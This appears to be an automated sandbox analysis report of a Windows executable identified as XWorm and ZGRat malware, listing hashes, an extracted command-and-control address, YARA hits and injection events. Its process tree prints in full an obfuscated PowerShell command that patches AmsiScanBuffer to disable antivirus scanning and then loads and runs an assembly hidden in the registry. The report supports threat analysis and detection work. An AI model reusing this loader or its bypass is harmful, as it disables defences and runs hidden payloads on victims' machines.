Analysis
-
max time kernel
85s -
max time network
67s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
07-04-2024 07:31
Static task
static1
Behavioral task
behavioral1
Sample
f267a71692c3683e3d6d0461e003f54f.exe
Resource
win7-20231129-en
General
-
Target
f267a71692c3683e3d6d0461e003f54f.exe
-
Size
2.3MB
-
MD5
f267a71692c3683e3d6d0461e003f54f
-
SHA1
189450a513d1f2412470eb965468f1324633d252
-
SHA256
74531f459fdb6837669583dc731b7a6afad5378782ab8bca5d726edac753f251
-
SHA512
b376166646548104ee092beba9af8af5a04695f828e1a1b21ccdfd8a1cb88347a40f31108066d0fe6176a5ce18bf3ef3b8ce4e82a6c6a6ee886efe2bfa7a7bd7
-
SSDEEP
49152:qjOIzFMNQnXmsIi7MS4bdotKHDG/GGcYsKYX78Y5Ye3:qjvzFMNQnWspj4bdot45GdsKYXl5Yo
Malware Config
Extracted
xworm
3.1
gamemodz.duckdns.org:6969
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3120-4981-0x0000000000400000-0x0000000000418000-memory.dmp family_xworm -
Detect ZGRat V1 34 IoCs
Processes:
resource yara_rule behavioral2/memory/3892-2-0x0000000006850000-0x0000000006A9C000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-5-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-6-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-8-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-10-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-12-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-14-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-16-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-18-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-20-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-22-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-24-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-26-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-28-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-30-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-32-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-34-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-36-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-38-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-40-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-42-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-44-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-46-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-48-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-50-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-52-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-54-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-56-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-58-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-60-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-62-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-64-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-66-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 behavioral2/memory/3892-68-0x0000000006850000-0x0000000006A96000-memory.dmp family_zgrat_v1 -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4720 created 588 4720 powershell.EXE winlogon.exe -
Executes dropped EXE 2 IoCs
Processes:
$7769ca3c$772491e3pid process 5036 $7769ca3c 3120 $772491e3 -
Drops file in System32 directory 2 IoCs
Processes:
powershell.EXEdescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 3 IoCs
Processes:
f267a71692c3683e3d6d0461e003f54f.exepowershell.EXEdescription pid process target process PID 3892 set thread context of 5036 3892 f267a71692c3683e3d6d0461e003f54f.exe $7769ca3c PID 4720 set thread context of 4952 4720 powershell.EXE dllhost.exe PID 3892 set thread context of 3120 3892 f267a71692c3683e3d6d0461e003f54f.exe $772491e3 -
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.EXEdllhost.exepid process 4720 powershell.EXE 4720 powershell.EXE 4720 powershell.EXE 4952 dllhost.exe 4952 dllhost.exe 4952 dllhost.exe 4952 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
f267a71692c3683e3d6d0461e003f54f.exepowershell.EXEdllhost.exe$772491e3description pid process Token: SeDebugPrivilege 3892 f267a71692c3683e3d6d0461e003f54f.exe Token: SeDebugPrivilege 4720 powershell.EXE Token: SeDebugPrivilege 4720 powershell.EXE Token: SeDebugPrivilege 4952 dllhost.exe Token: SeDebugPrivilege 3892 f267a71692c3683e3d6d0461e003f54f.exe Token: SeDebugPrivilege 3120 $772491e3 -
Suspicious use of WriteProcessMemory 37 IoCs
Processes:
f267a71692c3683e3d6d0461e003f54f.exepowershell.EXEdllhost.exelsass.exedescription pid process target process PID 3892 wrote to memory of 5036 3892 f267a71692c3683e3d6d0461e003f54f.exe $7769ca3c PID 3892 wrote to memory of 5036 3892 f267a71692c3683e3d6d0461e003f54f.exe $7769ca3c PID 3892 wrote to memory of 5036 3892 f267a71692c3683e3d6d0461e003f54f.exe $7769ca3c PID 3892 wrote to memory of 5036 3892 f267a71692c3683e3d6d0461e003f54f.exe $7769ca3c PID 3892 wrote to memory of 5036 3892 f267a71692c3683e3d6d0461e003f54f.exe $7769ca3c PID 3892 wrote to memory of 5036 3892 f267a71692c3683e3d6d0461e003f54f.exe $7769ca3c PID 3892 wrote to memory of 5036 3892 f267a71692c3683e3d6d0461e003f54f.exe $7769ca3c PID 3892 wrote to memory of 5036 3892 f267a71692c3683e3d6d0461e003f54f.exe $7769ca3c PID 3892 wrote to memory of 5036 3892 f267a71692c3683e3d6d0461e003f54f.exe $7769ca3c PID 4720 wrote to memory of 4952 4720 powershell.EXE dllhost.exe PID 4720 wrote to memory of 4952 4720 powershell.EXE dllhost.exe PID 4720 wrote to memory of 4952 4720 powershell.EXE dllhost.exe PID 4720 wrote to memory of 4952 4720 powershell.EXE dllhost.exe PID 4720 wrote to memory of 4952 4720 powershell.EXE dllhost.exe PID 4720 wrote to memory of 4952 4720 powershell.EXE dllhost.exe PID 4720 wrote to memory of 4952 4720 powershell.EXE dllhost.exe PID 4720 wrote to memory of 4952 4720 powershell.EXE dllhost.exe PID 4952 wrote to memory of 588 4952 dllhost.exe winlogon.exe PID 4952 wrote to memory of 680 4952 dllhost.exe lsass.exe PID 680 wrote to memory of 2544 680 lsass.exe sysmon.exe PID 680 wrote to memory of 2544 680 lsass.exe sysmon.exe PID 4952 wrote to memory of 960 4952 dllhost.exe svchost.exe PID 680 wrote to memory of 2544 680 lsass.exe sysmon.exe PID 680 wrote to memory of 2544 680 lsass.exe sysmon.exe PID 3892 wrote to memory of 3120 3892 f267a71692c3683e3d6d0461e003f54f.exe $772491e3 PID 3892 wrote to memory of 3120 3892 f267a71692c3683e3d6d0461e003f54f.exe $772491e3 PID 3892 wrote to memory of 3120 3892 f267a71692c3683e3d6d0461e003f54f.exe $772491e3 PID 680 wrote to memory of 2544 680 lsass.exe sysmon.exe PID 3892 wrote to memory of 3120 3892 f267a71692c3683e3d6d0461e003f54f.exe $772491e3 PID 3892 wrote to memory of 3120 3892 f267a71692c3683e3d6d0461e003f54f.exe $772491e3 PID 3892 wrote to memory of 3120 3892 f267a71692c3683e3d6d0461e003f54f.exe $772491e3 PID 3892 wrote to memory of 3120 3892 f267a71692c3683e3d6d0461e003f54f.exe $772491e3 PID 3892 wrote to memory of 3120 3892 f267a71692c3683e3d6d0461e003f54f.exe $772491e3 PID 4952 wrote to memory of 336 4952 dllhost.exe dwm.exe PID 4952 wrote to memory of 404 4952 dllhost.exe svchost.exe PID 680 wrote to memory of 2544 680 lsass.exe sysmon.exe PID 4952 wrote to memory of 736 4952 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:588
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:336
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{88427d95-63fa-4fc6-8c14-5b52690474fa}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:680
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:404
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:736
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2544
-
C:\Users\Admin\AppData\Local\Temp\f267a71692c3683e3d6d0461e003f54f.exe"C:\Users\Admin\AppData\Local\Temp\f267a71692c3683e3d6d0461e003f54f.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\$7769ca3c"C:\Users\Admin\AppData\Local\Temp\$7769ca3c"2⤵
- Executes dropped EXE
PID:5036
-
-
C:\Users\Admin\AppData\Local\Temp\$772491e3"C:\Users\Admin\AppData\Local\Temp\$772491e3"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uMSJiUFHvWMU{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wFTWRPHIbdTenY,[Parameter(Position=1)][Type]$gCqMzkKFfo)$PPyHSvKlNSD=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+'e'+'c'+''+'t'+''+[Char](101)+'dDel'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+'yD'+'e'+''+[Char](108)+'e'+'g'+'a'+[Char](116)+'e'+'T'+''+[Char](121)+'p'+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'Pu'+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+'l'+'e'+'d,'+'A'+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+'l'+''+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$PPyHSvKlNSD.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'i'+'a'+'lN'+'a'+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$wFTWRPHIbdTenY).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+''+'i'+''+'m'+'e'+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+'g'+'e'+'d'+'');$PPyHSvKlNSD.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+[Char](100)+'e'+'B'+'ySi'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+'al',$gCqMzkKFfo,$wFTWRPHIbdTenY).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+'e'+'d');Write-Output $PPyHSvKlNSD.CreateType();}$atNXCJvhUpBbW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+[Char](116)+''+'e'+''+'m'+''+'.'+''+[Char](100)+''+'l'+'l')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+'n'+''+'3'+''+'2'+'.'+'U'+'n'+[Char](115)+''+'a'+'f'+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+'e'+'Me'+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$SuZmZcowxWuovm=$atNXCJvhUpBbW.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+'ss',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$AlWPwmAxDmhlqyxPgfM=uMSJiUFHvWMU @([String])([IntPtr]);$lHaaLxJufJRFjdkUTVOzIp=uMSJiUFHvWMU @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XHFiHrNKEXh=$atNXCJvhUpBbW.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+'d'+'le').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'rn'+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ouYoQwfXOmvvJy=$SuZmZcowxWuovm.Invoke($Null,@([Object]$XHFiHrNKEXh,[Object]('Lo'+[Char](97)+''+'d'+''+[Char](76)+'i'+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+'A'+'')));$QjYfTyEcwZUAgfapJ=$SuZmZcowxWuovm.Invoke($Null,@([Object]$XHFiHrNKEXh,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$bijsmus=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ouYoQwfXOmvvJy,$AlWPwmAxDmhlqyxPgfM).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$MXTMXQrTsNfIZRENT=$SuZmZcowxWuovm.Invoke($Null,@([Object]$bijsmus,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+'u'+[Char](102)+'f'+'e'+''+[Char](114)+'')));$IyjeVwdIMp=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QjYfTyEcwZUAgfapJ,$lHaaLxJufJRFjdkUTVOzIp).Invoke($MXTMXQrTsNfIZRENT,[uint32]8,4,[ref]$IyjeVwdIMp);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MXTMXQrTsNfIZRENT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QjYfTyEcwZUAgfapJ,$lHaaLxJufJRFjdkUTVOzIp).Invoke($MXTMXQrTsNfIZRENT,[uint32]8,0x20,[ref]$IyjeVwdIMp);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+'W'+''+'A'+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+'7s'+'t'+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4720
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD5f267a71692c3683e3d6d0461e003f54f
SHA1189450a513d1f2412470eb965468f1324633d252
SHA25674531f459fdb6837669583dc731b7a6afad5378782ab8bca5d726edac753f251
SHA512b376166646548104ee092beba9af8af5a04695f828e1a1b21ccdfd8a1cb88347a40f31108066d0fe6176a5ce18bf3ef3b8ce4e82a6c6a6ee886efe2bfa7a7bd7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82